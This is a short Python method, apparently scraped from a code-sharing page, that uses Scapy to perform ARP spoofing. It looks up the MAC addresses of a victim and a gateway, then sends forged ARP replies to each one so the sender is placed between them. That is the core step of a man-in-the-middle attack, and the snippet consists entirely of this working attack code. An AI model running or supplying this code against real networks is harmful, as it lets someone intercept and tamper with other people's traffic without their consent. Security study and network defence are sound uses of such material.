def sending_arp(self):
victim = self.mac_getter(self.victimIP)
AP_MAC = self.mac_getter(self.gatewayIP)
# Those replies places us between them (ARP Spoofing)
send(ARP(op=2, pdst=self.victimIP, psrc=self.gatewayIP, hwdst=victim))
send(ARP(op=2, pdst=self.gatewayIP, psrc=self.victimIP, hwdst=AP_MAC))
评论列表
文章目录